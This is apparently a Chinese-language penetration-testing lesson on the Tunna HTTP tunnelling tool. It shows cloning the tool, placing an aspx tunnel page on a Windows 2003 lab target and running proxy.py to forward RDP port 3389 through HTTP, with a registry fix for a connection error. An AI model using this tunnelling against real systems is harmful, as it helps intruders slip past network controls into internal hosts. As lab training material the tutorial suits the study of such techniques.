第九十九课：HTTP隧道Tunna第三季

Tunna简介：

Tunna1.1 是 secforce 在2014年11月出品的一款基于HTTP隧道工具。其中v1.1中支持了SOCKS4a。

Tunna演示稿： https://drive.google.com/open?id=1PpB8_ks93isCaQMEUFf_cNvbDsBcsWzE

Github： https://github.com/SECFORCE/Tunna

攻击机： 192.168.1.5 Debian 192.168.1.4 Windows 7

靶机： 192.168.1.119 Windows 2003

安装：

root@John:~# git clone https://github.com/SECFORCE/Tunna.git
Cloning into 'Tunna'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 156 (delta 0), reused 2 (delta 0), pack‐reused 150
Receiving objects: 100% (156/156), 8.93 MiB | 25.00 KiB/s, done.
Resolving deltas: 100% (84/84), done.

靶机执行：

以aspx为demo。

攻击机执行：

python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v

附录：

解决：General Exception: [Errno 104] Connection reset by peer

[+] Spawning keep‐alive thread
[‐] Keep‐alive thread not required
[+] Checking for proxy: False

连接后，出现

General Exception: [Errno 104] Connection reset by peer

等待出现：无法验证此远程计算机的身份，是否仍要连接？

再次运行，在点击是(Y)

python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v

如果：没有出现“无法验证此远程计算机的身份，是否仍要连接？”

注册表键值： HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers 删除对应IP键值即可。

非常遗憾的是，Tunna对PHP的支持并不是太友好。

Micropoor